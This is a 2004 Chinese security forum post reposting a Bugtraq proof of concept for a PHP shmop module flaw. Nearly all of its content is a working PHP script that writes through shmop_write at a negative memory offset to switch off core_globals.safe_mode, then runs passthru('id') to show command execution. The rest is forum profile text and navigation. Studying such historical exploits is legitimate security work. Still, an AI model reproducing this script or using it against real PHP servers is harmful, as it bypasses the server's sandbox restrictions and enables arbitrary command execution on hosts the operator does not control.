PHP shmop.c module permits write of arbitrary memory

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6831
精华: 834
积分: 36069
阅读权限: 255
性别: 男
来自: 中国
在线时间: 599 小时
注册时间: 2004-6-25
最后登录: 2008-12-3

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-12-21 15:40 只看该作者

PHP shmop.c module permits write of arbitrary memory

信息来源：bugtraq@securityfocus.com

复制内容到剪贴板

代码:

<?

/*

  Php Safe_mode Bypass Proof of concept.

  

  Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it

  

  Disclaimer: The author is not responsible of any damage this script can cause

  

*/



 $shm_id = shmop_open(0xff2, "c", 0644, 100);

  if (!$shm_id) {

   echo "Couldn&#39;t create shared memory segment\n";

   die;

 }



// $data="\x01";

// the new value for safe_mode

 $data="\x00";

 

// this (-3842685) is my offset to reach core_globals.safe_mode

// taken with gdb. (0x40688d83)

 $offset=-3842685;

// Lets write the new value at our offset.

$shm_bytes_written = shmop_write($shm_id, $data, $offset );

if ($shm_bytes_written != strlen($data)) {

  echo "Couldn&#39;t write the entire length of data\n";

}



//Now lets delete the block and close the shared memory segment

if (!shmop_delete($shm_id)) {

  echo "Couldn&#39;t mark shared memory block for deletion.";

}

shmop_close($shm_id);



// Let&#39;s try if safe mode has been set to off

echo passthru("id");

dl("shmop.so");

?>

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » PHP shmop.c module permits write of arbitrary memory